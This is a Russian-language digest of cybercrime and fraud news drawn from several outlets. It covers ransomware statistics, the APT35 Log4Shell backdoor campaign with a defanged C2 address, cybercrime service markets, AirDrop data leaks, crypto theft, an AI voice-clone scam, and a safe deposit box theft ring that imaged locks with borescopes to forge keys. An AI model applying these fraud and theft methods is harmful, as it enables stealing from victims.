А посредники в США помогали нигерийцам получать и отмывать все нечестно заработанное через криптовалюту, банковские счета в США и службы денежных переводов, такие как Western Union или MoneyGram.
Как сообщают полицейские, Эгвумба получал от сообщников информацию о банковских счетах жертв и передавал их другим мошенникам, после чего сам начинал заниматься мошенничеством с помощью вредоносных программ и других инструментов. Общаясь со своими подельниками через в различных чатах, он получал данные банковских счетов, на которые потом переводились украденные деньги.
В свою очередь, Дуру помогал помогал своим подельникам-киберпреступникам получать и отмывать грязные деньги, открывая поддельные банковские счета для бизнеса и переводя деньги на разные криптокошельки.
source: justice[.]gov/usao-cdca/pr/orange-county-man-and-sacramento-man- sentenced-prison-participating-massive-fraud-and
По данным Group-IB, операторы шифровальщиков требовали от жертв $247 тысяч в
прошлом году.
В отчете сказано, что рекордная сумма насчитывает $240 миллионов, в России —
250 миллионов рублей. Для этого исследователи компании проанализировали более
700 кибератак по всему миру и пришли к выводу, что самыми популярными целями
для злоумышленников были Северная Америка (52%) и Европа (28%), затем идет
Азиатско-Тихоокеанский регион (10%) и Латинская Америка (6%).
Ранее аналогичный отчет опубликовало подразделение анализа угроз Unit 42 компании Palo Alto Networks. В нем утверждается, что средний размер требуемого выкупа вырос на 144% по сравнению с 2020 годом и достиг $2,2 миллиона, а средний размер реально выплаченной суммы составил $540 тысяч (+78%).
Рекордную сумму в $240 миллионов потребовали операторы шифровальщика Hive от немецкой сети магазинов электроники и бытовой техники MediaMarkt в ноябре 2021 года. Атака хакеров привела к отключению ИТ-систем и нарушению работы магазинов в Нидерландах и Германии. Наибольшее число атак совершили группы LockBit, Conti и Pysa; среднее время восстановления работы атакованной компании увеличилось за год с 18 до 22 дней.
В России число атак в прошлом году выросло более чем на 200%, в первом квартале этого года — в четыре раза по сравнению с годом ранее. Самыми активными были группы Dharma, Crylock и Thanos; наиболее крупный в стране выкуп за расшифровку данных от жертвы потребовала хакерская группа OldGremlin — 250 милионов рублей.
Правительственная хакерская группировка APT35 (также Charming Kitten или Phosphorus), за которой якобы стоят власти Ирана, запустила кибератаки, устанавливающие на компьютеры жертв PowerShell-бэкдор. Примечательно, что в этой кампании злоумышленники эксплуатируют уязвимость Log4Shell, всколыхнувшую мир ИБ под конец прошлого года.
Модульный пейлоад, фигурирующий в новых атаках, может поддерживать связь с командным сервером (C2), а также получать, расшифровывать и загружать дополнительные модули для расширения функциональности.
Используемый эксплойт Log4Shell предназначен для уязвимости CVE-2021-44228, которую выявили в декабре 2021 года в библиотеке для логирования — Apache Log4j. Как отметили специалисты Check Point, APT35 одной из первых взяла в оборот эксплойт, пока ещё не все успели установить выходящие патчи.
Спустя считаные дни после раскрытия информации о Log4Shell иранские хакеры уже вовсю сканировали Сеть на наличие уязвимых систем. Check Point, с самого начала наблюдавшая за этими атаками, отметила уже известную инфраструктуру CharmPower, которая раньше встречалась в кампаниях киберпреступной группировки.
В случае успешной эксплуатации CVE-2021-44228 злоумышленники устанавливают в систему жертвы модульный бэкдор, запуская PowerShell-команду с зашифрованным base64 пейлоадом. Далее на устройство устанавливается модуль из хранилища Amazon S3 Bucket, принадлежащего APT35.
Среди ключевых функций вредоносной программы исследователи отмечают следующие:
Валидация сетевого соединения. После запуска скрипт ждёт активного интернет-соединения, отправляя запросы HTTP POST домену google.com с параметром hi=hi.
Сбор информации о системе. Скрипт записывает версию Windows, имя компьютера и контент файла Ni.txt, хранящегося в каталоге $APPDATA.
Получение адреса C2-домена. Вредонос декодит C2-домен из жёстко заданного в коде URL — hxxps://s3[.]amazonaws[.]com/doclibrarysales/3. Ссылка хранится в том же «ведре» S3, что и сам бэкдор.
Получение, расшифровка и выполнение дополнительных модулей.
• Source: [https://research.checkpoint.com/202...to-distribute-new-modular- powershell-toolkit/](https://research.checkpoint.com/2022/apt35-exploits- log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/)
Концепция SSD-Insider++ предусматривает оценку моделей активности накопителей в случае атак шифровальщиков.
Команда ученых из университетов Южной Кореи и США разработали новую технологию, помогающую защитить твердотельные накопители (SSD) от атак программ-вымогателей, путем быстрого обнаружения и отмены шифрования в течение нескольких секунд.
Концепция SSD-Insider++ предусматривает оценку моделей активности накопителей в случае атак шифровальщиков. Вместо программной защиты технология задействует непосредственно сам накопитель – защита обеспечивается на уровне контроллера с помощью специальной прошивки.
По словам авторов исследования, данная идея возникла из-за того, что большинство пользователей не заботятся об установке ПО для борьбы с программами-вымогателями.
В случае обнаружения вредоносной активности система отключает возможность ввода/вывода данных на накопителе, что позволяет пользователю удалить вредоносный процесс шифрования. SSD-Insider++ также позволяет восстановить данные всего за несколько секунд.
В рамках тестирования технология показала 100%-ю эффективность в отношении лабораторных и настоящих образцов программ-вымогателей, включая WannaCry и Mole. Информация восстанавливалась в течение 10 секунд. Отмечается, что технология спровоцировала рост задержек работы на 12,8-17,3%.
source: ieeexplore.ieee.org/document/9146350
В Кузбассе суд вынес приговор 33-летнему мошеннику, который похитил около 1 миллиона рублей у жительницы Ижевска. Об этом сообщается на сайте управления МВД по Кемеровской области.
В октябре 2019 года в дежурную часть полиции поступило заявление от 24-летней жительницы города Ижевска. Она сообщила, что неизвестный обманным способом похитил у нее около 1 миллиона рублей. В результате проведения комплекса оперативно-розыскных мероприятий сотрудники полиции установили и задержали подозреваемого. В отношении него следователем было возбуждено уголовное дело.
В ходе расследования установлено, что в мае 2019 года фигурант с фейковой страницы разместил в одной из социальных сетей объявление о трудоустройстве девушек в качестве актеров для съемок фильмов категории «18+». Спустя некоторое время с ним связалась жительница Ижевска, желавшая получить указанную работу. Обвиняемый пообещал горожанке трудоустройство и в течение полугода, гарантируя в будущем крупный заработок, обещая жениться и используя другие предлоги, убеждал собеседницу перечислять на его счет денежные средства. В общей сложности жительница Ижевска совершила 127 переводов на сумму 995 000 рублей.
Деньги девушка заняла у знакомого под предлогом лечения матери, а также занимала деньги в микрозаймовых организациях. В определенный момент она всё- таки осознала, что её обманывают, и обратилась в полицию.
Задержанный полностью признал свою вину и выплатил заявительнице 10 000 рублей в счет возмещения причиненного ущерба.
Доказательства, собранные следствием, судом признаны достаточными для вынесения фигуранту обвинительного приговора. В качестве наказания ему назначено 5 лет лишения свободы с отбыванием в исправительной колонии общего режима.
Специалисты ИБ-компании CrowdStrike, отслеживающие деятельность множества преступных групп, проанализировали их бизнес-модели и партнерские взаимоотношения. Результаты проведенной работы показали, что экосистема киберкриминала на самом деле не столь велика, как может показаться стороннему наблюдателю, однако за последние годы она обросла обширной сетью сервисов, облегчающих задачу злоумышленникам.
Согласно годовому отчету CrowdStrike, с которым ознакомился репортер ZDNet, крупные преступные группы, действующие в интернете, обычно используют услуги субподрядчиков — точно так же, как легитимные ИТ-компании. Такие ОПГ постоянно поддерживают взаимосвязь с другими участниками криминального сообщества, чтобы иметь доступ к новейшим технологиям, позволяющим повысить эффективность кибератак и финансовую выгоду.
Систематизация взаимоотношений ОПГ и теневых сервис-провайдеров позволила аналитикам выделить три основные категории востребованных услуг на подпольном рынке. Это специализированные сервисы (в разделении по сферам деятельности), службы доставки вредоносного контента и услуги по монетизации краденых данных.
Список современных спецсервисов, согласно CrowdStrike, выглядит следующим образом:
предоставление доступа к взломанным сетям; аренда DDoS-инструментария;
предоставление доступа к средствам шифрования трафика и обеспечения анонимности;
продажа и сдача в аренду фишинг-паков; продажа спецаппаратуры (банкоматных скиммеров, анализаторов сети и проч.);
вредоносные программы как сервис (Malware-as-a Service, MaaS);
вымогательские программы как сервис (Ransomware-as-a-Service, RaaS);
загрузка вредоносных программ на ботнет; проверка зловредов на
детектирование антивирусами; упаковка кода с целью его маскировки;
проверка данных банковских карт;
продажа генераторов веб-инжектов для банковских троянов; bulletproof- хостинг;
вербовка пособников киберпреступлений.
Click to expand...
Из популярных услуг по распространению вредоносного контента эксперты назвали следующие:
спам-рассылки в соцсетях;
спам-рассылки по каналам электронной почты;
разработка и продажа эксплойт-паков;
перепродажа трафика с взломанных сайтов, перенаправление его на вредоносные или мошеннические страницы.
Click to expand...
Монетизировать добычу киберпреступникам помогают следующие сервисы:
сети дропов — наемников, изымающих краденые деньги из банкоматов или принимающих переводы на специально открытые счета в банках;
отмывание денег проводом через подставные фирмы или специализированные криптовалютные сервисы в даркнете (биткойн-миксеры);
закупка товаров на краденые деньги с оформлением доставки за рубеж с целью дальнейшей продажи;
продажа дампов данных, украденных в результате взлома;
шантаж жертв кражи данных;
организация купли-продажи краденых платежных данных;
сопровождение мошеннических схем, в том числе BEC-атак, нацеленных на отъем денег у юрлиц посредством взлома корпоративной почты.
Click to expand...
Несмотря на столь внушительные перечни, провайдеров, к которым часто обращаются злоумышленники, не так уж много. Правильность такого вывода подтверждают также результаты, недавно опубликованные Chainalysis. Таким образом, правоохранительным органам достаточно закрыть ряд популярных сервисов, и операции многих ОПГ будут приостановлены.
Выявить взаимоотношения известных ОПГ и поставщиков услуг, конечно, непросто, зато подобная информация помогает отслеживать операции преступников и раскрыть их личности: теневые провайдеры далеко не всегда скрывают свои данные — в отличие от APT-групп и других крупных криминальных группировок.
• Source: <https://www.crowdstrike.com/blog/global-threat-report- foreword-2021/>
• Source: <https://www.zdnet.com/article/this-chart-shows-the-connections- between-cybercrime-groups/>
Эксперты из Дармштадского технического университета в Германии обнаружили две уязвимости в AirDrop, пригодные для извлечения номеров телефонов и адресов электронной почты. Команда планирует представить свой доклад в августе 2021 года, на конференции USENIX.
Эти ошибки связаны с процессом аутентификации, который осуществляется на начальном этапе AirDrop- соединения: когда устройства пытаются обнаружить друг друга и определить, принадлежат ли они пользователям, которые знают друг друга (проверяя, находится ли номер телефона списке контактов другого девайса). Для этого устройства Apple обмениваются пакетами AWDL (Apple Wireless Direct Link), которые содержат информацию об устройствах и их владельцах, в том числе технические характеристики и личные данные (номера телефонов, идентификаторы Apple ID, адреса электронной почты). Чтобы защитить данные от перехвата, Apple шифрует их с помощью SHA256.
Исследователи объясняют, что устройство будет транслировать эти пакеты обнаружения во всех направлениях и в любое время, если AirDrop включен на устройстве. В итоге злоумышленник, находящийся в непосредственной близости к цели, может использовать WiFi-карту для перехвата этих сообщений, а затем взломать хешированные данные и восстановить личную информацию.
Первые данные об этих проблемах были опубликованы еще в 2019 году, и тогда эксперты описали различные методы восстановления информации через AirDrop, включая статус телефона, статус WiFi, версию ОС, доступность буфера и так далее. Теперь та же исследовательская группа расширила свое исследование, доказав, что восстановить можно и другие детали, в том числе номера телефонов и адреса электронной почты.
Ученые уведомили Apple о своих выводах дважды, в мае 2019 года и октябре 2020 года, и даже предложили компании использовать новый и настраиваемый протокол PrivateDrop для предотвращения подобных утечек. Однако специалисты так и не получили ответа от Apple, и неясно, планирует ли компания исправить обнаруженные проблемы.
Источник: xakep.ru/2021/04/22/airdrop-leak/
В прошлом месяце компания Google объявила о планах по внедрению новой функции Federated Learning of Cohorts (FLoC), которая должна заменить собой сторонние файлы cookie, использующиеся рекламными сетями и аналитическими платформами для отслеживания пользователей
Напомню, что совсем недавно разработчики DuckDuckGo предупреждали, что широко обсуждаемый план Google по отказу сторонних cookie в Chrome к концу 2022-2023 года, а также связанные с этим ограничения, уже реализованные в других браузерах, не помешают производителям следить за пользователями.
Тогда глава DuckDuckGo Габриэль Вайнберг писал, что технологии Google, предназначенные для замены сторонних файлов cookie (включая FLoC), и связанные с ними методы доставки рекламы, якобы разработанные с упором на конфиденциальность, по-прежнему могут быть полезны для отслеживания людей. В частности, FLoC нацелен на присвоение пользователям идентификаторов групп интересов и может быть объединен с IP-адресом, в итоге став уникальным идентификатором конкретного человека.
«Таким образом, любой трекер, который получает и то и другое [идентификатор FLoC и IP-адрес], может использоваться для отслеживания и исключительно хорошо ориентироваться в поведении пользователя без сторонних файлов cookie и чего-либо еще», — говорил Вайнберг.
Click to expand...
Также нужно отметить, что FLoC сразу раскритиковали эксперты Electronic Frontier Foundation (EFF), назвав это «ужасной идеей», ведь Chrome, по сути, будет делиться сводкой недавней активности каждого пользователя с маркетологами. А теперь еще и разработчики Vivaldi и Brave оказались от использования FLoC.
Создатели Vivaldi и Brave сообщили, что не будут поддерживать технологию, вскоре после того как Google обнародовала свои планы по испытанию FLoC на небольшой группе пользователей Chrome, которые автоматически будут включены в пилотный проект.
«Новый инструмент Google по сбору данных отвратителен. FLoC (Federated Learning of Cohorts — объединённое обучение по группам) — это новая рекламная технология, призванная заменить сторонние Cookies и подобные средства вроде localStorage. Это откровенно опасный шаг, нарушающий приватность пользователей.
Мы в Vivaldi всегда защищаем приватность наших пользователей. Мы не допускаем отслеживания активности пользователей или создание их поведенческих профилей, в любой форме. Мы даже собственным продуктам не позволяем создавать локальные поведенческие профили пользователей», — заявил глава Vivaldi Йон фон Течнер.Click to expand...
Это мнение разделяют и другие эксперты. Так, блог разработчиков Brave гласит:
«Худший аспект FLoC заключается в том, что он наносит существенный вред конфиденциальности пользователей под видом обеспечения этой самой конфиденциальности».
Click to expand...
Борьба с новой технологий уже началась. Так, специалисты EFF запустили специальный сайт, AmIFloced.org, где любой пользователь может проверить, не тестирует ли Google FLoC именно в его браузере. В свою очередь, инженеры DuckDuckGo выпустили расширение Privacy Essentials для Chrome и других браузеров, которое может блокировать FLoC. Кроме того, владельцы сайтов, которые не хотят работать с FLoC, могут заблокировать его, отправив своим посетителям следующий хэдер HTTP-запроса: Permissions-Policy: interest- cohort=().
Источник: xakep.ru/2021/04/14/floc-off/
15 марта 2021 года DeFi-проект Cream Finance и децентрализованная биржа PancakeSwap подверглись атакам на подмену DNS. В результате посетители попадали на фейковые сайты, где мошенники пытались выведать их seed-фразы и приватные ключи, чтобы получить доступ к кошелькам и похитить средства.
__https://twitter.com/x/status/1371473314082873344
Обнаружив атаки, обе компании сообщили о проблемах в Twitter и призвали пользователей временно воздержаться от посещения их сайтов, подчеркнув, что сами сайты не скомпрометированы. Также администрация Cream Finance и PancakeSwap просила пользователей не вводить seed-фразы и приватные ключи на фишинговых сайтах злоумышленников во избежание проблем.
__https://twitter.com/x/status/1371448627663491088
__https://twitter.com/x/status/1371470368058183687
По мнению ИБ-специалистов, за этими атаками явно стоит один и тот же злоумышленник, поскольку записи DNS для обоих сайтов были изменены с интервалом в одну минуту.
[](https://xakep.ru/wp- content/uploads/2021/03/343191/whois-records-1.jpg)
Как именно злоумышленникам удалось подменить записи DNS для обоих сайтов, пока неясно, но, как отмечает MalwareHunterTeam, обе компании управляли своими записями DNS через хостинговую компанию GoDaddy.
__https://twitter.com/x/status/1371480290821074956
Хотя теоретически атакующие могли скомпрометировать хостинговые аккаунты обеих компаний, также есть вероятность, что атаке подвергся сотрудник GoDaddy. Дело в том, что это будет уже не первый инцидент такого рода: в марте и ноябре прошлого года работники GoDaddy уже становились жертвами фишеров. Тогда злоумышленники проникли в систему и изменили DNS для ряда ресурсов, связанных с криптовалютой и хостингом, в том числе Escrow.com, Liquid.com, NiceHash.com, Bibox.com, Celsius.network и Wirex.app.
В настоящее время представители Cream Finance и PancakeSwap сообщают, что уже почти восстановили контроль над доменами, и для большинства пользователей посещение сайтов безопасно.
__https://twitter.com/x/status/1371528332521566212
__https://twitter.com/x/status/1371492312681902080
__https://twitter.com/x/status/1371645539180191746
Источник: xakep.ru/2021/03/16/cream-finance-pancakeswap-dns/
Минюст Филиппин выдвинул против Владимира Авдеева и Сергея Ящука обвинения в краже около 340 млн PHP (~$5,8 млн) в токенах XRP у местной криптобиржи Coins.ph.
Двое граждан России были консультантами платформы, управляемой компанией BETUR. По данным следствия, они воспользовались знанием внутренней сетевой инфраструктуры и протоколов безопасности онлайн-площадки биржи для получения доступа к средствам.
В Coins.ph подтвердили, что взлом мог быть осуществлен только инсайдерами.
Инцидент произошел в октябре стал 2023 года и стал одним из крупнейших по сумме ущерба в индустрии за этот месяц.
Авдеев и Ящук вывели 12,2 млн XRP на общую сумму 340,745 млн PHP.
Изучившие взлом [эксперты The Bloc](https://www.theblock.co/post/258701/philippines-based-exchange-coins-ph- appears-to-have-lost-12-2-million-xrp-in-possible-exploit) определили, что в течение 30 минут подозреваемые отправили 13 лотов по 1 млн XRP, а также партию в 200 000 XRP. Частично транзакции по какой-то причине прошли.
Далее средства попали на биржи OKX, WhiteBIT, SimpleSwap, кроссчейн-протокол OrbitBridge, DEX ChangeNOW и Fixed Float, а также на ряд других площадок.
WhiteBIT по запросу Coins.ph заблокировала по меньшей мере 445 000 токенов.
За нарушения положений Закона о предотвращении киберпреступности 2021 года прокуроры предъявили Авдееву обвинение из 23 пунктов, а Ящуку — из трех. По каждой позиции установлен залог в 120 000 PHP (~$2055).
По данным CoinGecko, объем торгов на филиппинской бирже за последние 24 часа составил около $9 млн. Наиболее ликвидная пара на платформе — USDT/PHP.
• Source: https://www.pna.gov[.]ph/articles/1228602
Схема работает следующим образом: сначала со взломанного аккаунта
потенциальным жертвам отправляют сообщения с просьбой одолжить крупную сумму и
для убедительности добавляют "голосовушку" от лица реального владельца
аккаунта и фото его банковской карты с указанием имени и фамилии.
Причем у одной из жертв мошенники использовали имя и фамилию, как в паспорте,
отличные от имени в мессенджере. Сумма, которую хотели заполучить преступники,
составляла 200 тыс. руб.
Аудиосообщения мошенники синтезируют с помощью ИИ-сервисов, использовав
сохраненные голосовые в мессенджере жертвы.
Это новая для России и довольно продвинутая мошенническая схема, отметил ведущий специалист департамента Digital Risk Protection компании F.A.C.C.T. Евгений Егоров.
"Схема опасна тем, что мошенники используют несколько факторов идентификации жертвы — аккаунт, голос и банковскую карту", — заключил Егоров.
Как избежать такого мошенничества? В первую очередь, обезопасить свой аккаунт
и соблюдать цифровую гигиену:
Включить
все инструменты безопасности в мессенджерах, в том числе двухфакторную
идентификацию и виртуальный пароль.
Не
переходить по подозрительным ссылкам.
Не
сообщать и не вводить на подозрительных ресурсах коды из СМС и пуш-
уведомлений.
Если
вам написала родственница или коллега с просьбой проголосовать или
поучаствовать в конкурсе — перепроверьте эту информацию.
full:
https://www.rbc.ru/technology_and_media/10/01/2024/659d37899a79473f8a99e35f?from=copy
Дениш Сахадеван, более известный в TikTok как инвестор Дэнни Деван, признал вину в отмывании выделенных государством средств, в том числе при помощи первой криптовалюты. Об этом сообщает Минюст США.
По данным прокуратуры округа Мэриленд, инфлюенсер пытался обмануть кредиторов и власти, чтобы получить ссуды в связи с COVID-19 на сумму $1,2 млн.
В начале пандемии правительство США приняло закон о финансовой помощи. Проект включал в себя программы защиты заработной платы (PPP) и льготы на случай причинения экономического ущерба (EIDL).
Следствие утверждает, что Сахадеван использовал обе программы для его финансовых манипуляций. Начиная с марта 2020 года, он создавал поддельные налоговые формы и банковские выписки, а затем подавал заявки PPP и EIDL через несколько подконтрольных ему организаций.
Согласно материалам дела, блогер получил 71 кредит PPP на сумму $941 000 и оформил 8 заявок EIDL на $238 000. До этого он занял в банке около $1,3 млн, которые потратил на покупку особняка с шестью спальнями.
С помощью полученных от государства средств, мужчина пытался погасить свои долги. Он также отправил часть из этих денег своей девушке.
24 февраля 2023 года полиция провела обыск в доме Сахадевана и обнаружила 18 водительских прав, принадлежащих разным людям, $17 000 наличными и «золотой физический биткоин в черном футляре». Правоохранители изъяли все в качестве улик.
В конечном итоге блогер признался в мошенничестве с использованием электронных средств связи, краже личных данных при отягчающих обстоятельствах и отмывании денег с использованием криптовалют.
Максимальное наказание по этим обвинением: 20 лет тюремного заключения за мошенничество, 10 лет за отмывание денег и два года за кражу личных данных. В рамках соглашения о признании вины Сахадеван лишится наличных денег и биткоинов, которыми он владел, и выплатит $429 000 в качестве штрафа.
Напомним, в апреле правоохранители Нью-Йорка задержали бывшего брокера банков JPMorgan и Deutsche Bank Рашона Рассела по подозрению в мошенничестве с цифровыми активами.
source: justice[.]gov/usao-md/pr/former-social-media-influencer-pleads-guilty- federal-charges-scheming-obtain-more-12
Как сообщили в бруклинской федеральной прокураторе Восточного округа штата Нью-Йорк, 20 апреля там были арестованы 56-летний Вал Купер (он же Вал Конон и он же Валерий Кононенко); 52-летний Алекс Левин и 49-летний Гарри Смит (он же Игорь Берк и он же Игорь Беркович), которых для гладкости повествования я в дальнейшем буду называть их родными фамилиями.
В деле есть данные, что Игорь Беркович, оказавшись в Америке, в мае 2015 года стал Игорем Берком, а в апреле 2018 Гарри Смитом. Аналогичным образом Валерий Кононенко в сентябре 2006 года стал Валом Кононом, а ноябре 2016 Валом Купером. Только Левин остался Левиным, очевидно потому, что и в Америке это достаточно распространённая фамилия, взять хотя бы его нынешнего судью.
Все трое обвиняются в отмывании денег, что понятно, и «сговоре с целью нарушения Закона о поездках (Travel Act) в связи с их ролями в мошенническом намерении украсть больше 30 млн долларов наличными и другими ценностями из депозитных ячеек банков за рубежом, в основном в Восточной Европе». Доказанное отмывание денег грозит им лишением свободы сроком до 20 лет, и столько же можно получить за нарушение Закона о поездках.
Поясню, что принятый в 1961 году при президенте Кеннеди International Travel Act считает федеральным преступлением «использование в преступных целях федеральной почты или поездок между штатами и за границу». Что такое отмывание полученных преступным путем денег, в объяснении не нуждается. Все трое подсудимых натурализованные граждане США, родившиеся в бывшем Советском Союзе – Кононенко и Беркович в Украине, а Левин в Белоруссии. В тот же день арестованных доставили в бруклинский федеральный суд, где магистрат Роберт Леви по видеосвязи ознакомил их с обвинением, которое в этом деле представляет русскоязычный помощник федерального прокурора Андрей Спектор, а также его коллеги Кит Эделман и Джой Лурински. В ней я заподозрил, было, тоже русскоязычные корни, но, разглядев фото в интернете, понял, что такого загара у кавказской, то есть белой расы не бывает.
В суде Алекса Левина представляет русскоязычный адвокат и уроженец Ташкента Альберт Даян, широко известный эффективной и агрессивной защитой самого широкого спектра русскоязычных обвиняемых: от бруклинского бандита Алексея Цветкова по кличке «Пельмень» до бухарских евреев-ювелиров с 47-й улицы в Манхэттене, а также всемирно известного россиянина Виктора Бута. Выслушав аргументы обвинения и защиты, судья Леви освободил Левина под залог в полмиллиона долларов. «Действия Левина, при получении предметов не знавшего, для чего они будут использованы, – не преступление», – процитировал адвоката корреспондент NBC News Дэвид Ли, сгоряча назвав Альберта Даяна Николасом.
43-летний Тони Мирвис, адвокат Валерия Кононенко, родился в США в семье эмигрантов из Одессы и в 2004 году закончил New York Law School. На его счету тоже хватает русскоязычных клиентов, включая того же «Пельменя», которого он защищал от обвинения, с бандитизмом не связанного. До уточнения позиций судья- магистрат Роберт Леви оставил Кононенко в бруклинской федеральной тюрьме MDC. Игоря Берковича, который стал Смитом, защищает бруклинский адвокат Джереми Яндоло, и его клиента судья тоже оставил под стражей, но уже в манхэттенской федеральной тюрьме МСС.
Настаивая на мере пресечения в виде содержания под стражей, прокуроры Кит Эдельман и Джой Лурински отметили, что у Купера-Кононенко в Украине живут мать и семья, а ему с женой там и в России принадлежит недвижимость. К тому же, по предоставленным украинской прокуратурой данным, в 1968 году 21-летний Кононенко был судим за кражу, а в 2001 обвинялся в неуточненном преступлении, но до суда дело не дошло. О Левине известно, что в апреле 2000 года в том же бруклинском федеральном суде он признал себя виновным в мошенничестве с акциями на бирже и в феврале 2002 был приговорен к двум годам тюрьмы. Это было крупное дело на общую сумму 100 млн долларов, и обвиняемыми были в основном итальянцы, связанные с мафией Коза Ностра, а из «наших», кроме Левина, проходили Яков Славин, Руслан Джикия, Александр Мучник и Денис Юровский.
Дело, по которому Алекс Левин проходит сейчас, вызвало оживленный интерес в СМИ с первого же дня. «Трое бруклинцев обвинены в международном грабеже банков на 30 млн долларов», – сообщил канал Fox News, а канал CNN высказался, что это «прямо из голливудской картины». В нескольких новостных изданиях в Сети появились названия «В Бруклине забрали современных грабителей банков», и это все по-английски, а в русскоязычных изданиях и социальных сетях можно было встретить заголовки со словами «Медвежатники XXI века». Такого же мнения оказался начальник нью-йоркского отделения ФБР Уильям Суини. «Преступление, которое мы предполагаем в данном обвинении, – заявил Суини в пресс-релизе прокуратуры, – читается, словно голливудские истории. Воры использовали сложные инструменты для взлома систем безопасности иностранных банков, и пытались замести следы, отмывая деньги через банки США. Однако, благодаря выдающейся работе отдела борьбы с евразийской организованной преступностью нашего ФБР и наших международных партнеров, преступникам предъявлены реальные обвинения и их, возможно, ждут реальные сроки в федеральной тюрьме».
Временно исполняющий обязанности федерального прокурора Восточного округа штата Нью-Йорк Марк Леско высказался чуть подробнее, заявив, что «обвиняемые и их сообщники, предположительно, входили в изощренную сеть преступников, которые использовали высокотехнологичные камеры для кражи миллионов наличными и других ценностей у жертв, пытавшихся защитить свое имущество с помощью сейфов в депозитных ячейках зарубежных стран, и затем отмывали доходы от своей аферы через финансовую систему Соединенных Штатов». Леско, который до назначения в бруклинскую прокуратуру работал помощником замминистра, заявил, что его ведомство будет «привлекать к ответу всех, кто использует нашу финансовую систем для мошенничества и воровства здесь или за рубежом», и выразил признательность Агентству Европейского союза по сотрудничеству в области правоохраны (Европол), а также правительствам Азербайджана, Латвии, Молдовы, Северной Македонии, Украины и Узбекистана за их помощь в расследовании.
Что же такого натворили Кононенко-Купер, Беркович-Смит и Левин, что им такой почет? В обвинении поясняется, что они обкрадывали депозитные ячейки вкладчиков банков вышеперечисленных стран Восточной Европы с помощью бароскопов. Бароскоп, он же эндоскоп, – популярный и относительно недорогой оптический прибор, который используют для контроля работы, в которой область осмотра недоступна иными способами. Эндоскопы широко применятся в медицине, а бароскопы часто используются для судебных экспертиз в правоохранительных органах, строительной инспекции для проверки перекрытий, стен зданий и сооружений, оружейной отрасли для проверки внутренней поверхности ствола огнестрельного оружия. Подсудимые по данному делу нашли им еще одну сферу применения. Приобрести бароскоп не сложнее щелчка пальцами – интернет-лавка Amazon предложит вам широчайший ассортимент в среднем по сотне долларов и бесплатно доставит на дом.
Все гениальное просто, и подсудимые с сообщниками, которых обычно называют «известные и неизвестные», выбирали банк попроще, с не очень налаженной системой охраны обычно подвальных комнат с персональными сейфами. Они абонировали такой сейф, получая доступ в комнату, и заходили к своей ячейке, на время пользования которой работник банка оставлял их в комнате одних. Пользуясь этим, с помощью бароскопа они снимали полости замков других ячеек достаточно четко, чтобы по снимкам изготовить ключи, и в следующий визит опустошали эти ячейки. Валерия Кононенко прокуратура считает «паровозом», то есть вожаком преступной группы, который осуществлял общее руководство, получал украденное и отмывал его через подконтрольные ему счета в банках Соединенных Штатов. Алекс Левин, предположительно, через свои счета в американских банках приобретал бароскопы и другую технику, а также отмывал краденые деньги. Игорь Беркович непосредственно воровал, прилетая для этого в намеченный банк из Соединенных Штатов. Оставшись в комнате одни, – написано в обвинении, – они открывали другие ячейки, набивали сумки украденным имуществом… и выходили из банка через главный вход». В качестве вещдоков к делу приложены фотоснимки поддельных ключей, полостей замков, а также самих участников преступной группы за «работой» в банках.
Точно так же, как грабители банков заменили маски и автоматы на компьютер, «медвежатники», как прозвали взломщиков сейфов», с фомки перешли на бароскоп. На заре колхозного движения в Советском Союзе это называлось «техника пришла на поля», и, как утверждает прокуратура, с марта 2015 по октябрь 2019 года «медвежатники XXI века» сумели похитить из персональных сейфов банков пяти восточноевропейских и двух среднеазиатских стран денег и ценностей на общую сумму больше 30 млн долларов. Среди похищенных ценностей были наши доллары, иностранная валюта, ювелирные изделия и слитки золота. При обыске в день ареста Купера-Кононенко в его доме нашли ключи от банковских депозитных ячеек без номеров, наличные доллары, ювелирные изделия и дорогие женские сумки. В камере хранения, которую Кононеко арендовал в Бруклине, нашли бароскоп и замок депозитной ячейки.
В обвинении перечислены 9 поэтапных эпизодов «наезда» группы, если не сказать «банды», Кононенко на рижский Privatbank 15 января 2018 года, когда оттуда были похищены деньги и ценности на общую сумму примерно 2 млн долларов. Все началось 21 октября 2015 года, когда Алекс Левин купил спецтехнику на деньги одной из компаний Кононенко. 25 апреля 216 года он купил дополнительную технику, которая была доставлена из Огайо домой Левину в Бруклин. 11 июля 2017 года Кононенко отправил Левину фотографию замка депозитной ячейки, которые есть в продаже. 31 декабря 2017 года «Соучастник-1» (СС1) на свою кредитную карту купил для Берковича-Смита билет на рейс 1 января 2018 года из Нью-Йорка в Ригу, а на следующий день по той же кредитной карте заплатил за проживание Игоря Берковича в рижском отеле. 4 января 2018 года Беркович явился в Privatbank (в деле – Latvian Bank) и поддельными ключами открыл и осмотрел несколько депозитных ячеек. 6 января СС1 на свою кредитную карту купил Куперу- Кононенко авиабилет на 12 января из Нью-Йорка в Ригу, и 15 января 2018 года прилетевший туда Кононенко с другими членами преступной группы опустошил намеченные ячейки. 15 января Беркович встретился с другими членами группы в рижском отеле, где они поделили украденное, и в тот же день он улетел из Риги в Варшаву, откуда вернулся в США.
Интересно, что в марте 2018 года на латвийском сайте kompromat.lv появилась статья «Дело о краже из сейфов в Privatbank: источник в полиции рапортует о задержании сотрудницы одного из банков». Там сообщалось, что сотрудникам латвийской полиции удалось по горячим следам задержать гражданку 1990 года рождения, которую поместили в следственный корпус рижской тюрьмы Ильгюциемс. «За банковскими ячейками велось скрытое видеонаблюдение, – сообщалось в статье со ссылкой на источник в городском Управлении криминальных расследований. – Privatbank предоставил запись, которая свидетельствует о возможном участии девушки в краже. Эта, ранее не судимая сотрудница одного из банков является иностранкой, а потому суд применил к ней арест». С этого ареста и пошла «раскрутка», за которую наше ФБР отдельно поблагодарило латвийских коллег.
Уязвимость нулевого дня в Windows позволяет перехватить учетные данные NTLM, а для ее эксплуатации достаточно обманом вынудить пользователя просмотреть вредоносный файл через Windows Explorer. Официального исправления для этой проблемы пока нет.
Свежая уязвимость, которой еще не присвоен идентификатор CVE, была [обнаружена](https://blog.0patch.com/2024/12/url-file-ntlm-hash- disclosure.html) специалистами компании 0patch. Напомним, что 0patch – это платформа, предназначенная как раз для таких ситуаций, то есть исправления 0-day и других непропатченных уязвимостей, для поддержки продуктов, которые уже не поддерживаются самими производителями, обновлений кастомного софта и так далее.
По данным 0patch, новая проблема затрагивает все версии Windows, начиная с Windows 7 и Server 2008 R2 и заканчивая новейшими Windows 11 24H2 и Server 2022.
